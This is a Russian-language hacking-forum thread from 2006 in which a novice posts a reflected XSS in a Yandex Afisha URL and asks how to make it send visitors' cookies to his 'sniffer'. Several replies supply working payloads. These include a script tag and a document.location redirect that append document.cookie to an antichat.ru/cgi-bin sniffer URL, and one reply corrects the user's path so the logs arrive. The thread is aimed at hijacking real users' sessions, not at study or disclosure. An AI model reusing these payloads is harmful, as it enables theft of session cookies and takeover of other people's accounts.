ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss на яндексе... Требуеца помощь
  #1  
Старый 18.12.2006, 02:35
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475

Репутация: 70
Отправить сообщение для IDentety с помощью ICQ
Question Xss на яндексе... Требуеца помощь

PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E 
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать
 
Ответить с цитированием

  #2  
Старый 18.12.2006, 02:39
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

http://forum.antichat.ru/thread19610.html
 
Ответить с цитированием

  #3  
Старый 18.12.2006, 03:42
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475

Репутация: 70
Отправить сообщение для IDentety с помощью ICQ
По умолчанию

Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
 
Ответить с цитированием

  #4  
Старый 18.12.2006, 04:34
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Цитата:
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!
 
Ответить с цитированием

  #5  
Старый 18.12.2006, 04:50
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475

Репутация: 70
Отправить сообщение для IDentety с помощью ICQ
По умолчанию

да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.
 
Ответить с цитированием

  #6  
Старый 18.12.2006, 05:07
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475

Репутация: 70
Отправить сообщение для IDentety с помощью ICQ
По умолчанию

вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...
 
Ответить с цитированием

  #7  
Старый 18.12.2006, 07:21
Retscan
Познающий
Регистрация: 17.12.2006
Сообщений: 32
Провел на форуме:
172639

Репутация: 31
По умолчанию

Цитата:
Сообщение от IDentety  
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E 
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать
На, лови:
Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E
Плюс не забудь
 
Ответить с цитированием

  #8  
Старый 18.12.2006, 10:10
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 18.12.2006 в 10:21..
 
Ответить с цитированием

  #9  
Старый 18.12.2006, 10:33
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475

Репутация: 70
Отправить сообщение для IDentety с помощью ICQ
По умолчанию

вот соорудил я конструкцию такого вида

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript %20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E

но отчеты не приходят.. видно гдето абшибся
 
Ответить с цитированием

  #10  
Старый 18.12.2006, 10:40
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Помощь с putty aX0en С/С++, C#, Delphi, .NET, Asm 7 23.06.2009 14:52
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Xss на яндексе, помогите составить корректный запрос. red1rect Уязвимости 7 22.03.2006 14:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ